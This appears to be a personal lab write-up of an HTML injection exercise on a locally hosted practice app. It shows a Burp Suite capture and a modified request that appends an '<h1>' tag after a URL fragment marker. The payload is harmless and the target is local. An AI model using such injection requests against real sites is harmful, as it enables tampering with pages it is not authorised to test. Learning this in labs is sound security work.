This is new to me. A page that just echos our current URL. 

I had to look it up and it said something with BurpSuite? Let's try that.

When I look at it more I realize that we could maybe use the hashtag? It can be used to specify a HTML with the same id as the text after the character.
Let's try it.
First capture the request using Burp Suite
```html
GET /htmli_current_url.php HTTP/1.1
Host: localhost:4000
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=lad1s8oss53g0gkmu6ugkg1j32; security_level=0
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
```
Next let's change the GET parameter.
```html
GET /htmli_current_url.php#<h1>farisarch</h1> HTTP/1.1
Host: localhost:4000
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=lad1s8oss53g0gkmu6ugkg1j32; security_level=0
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

```
And let's forward that response and we should get

![[Pasted image 20210708144708.png]]

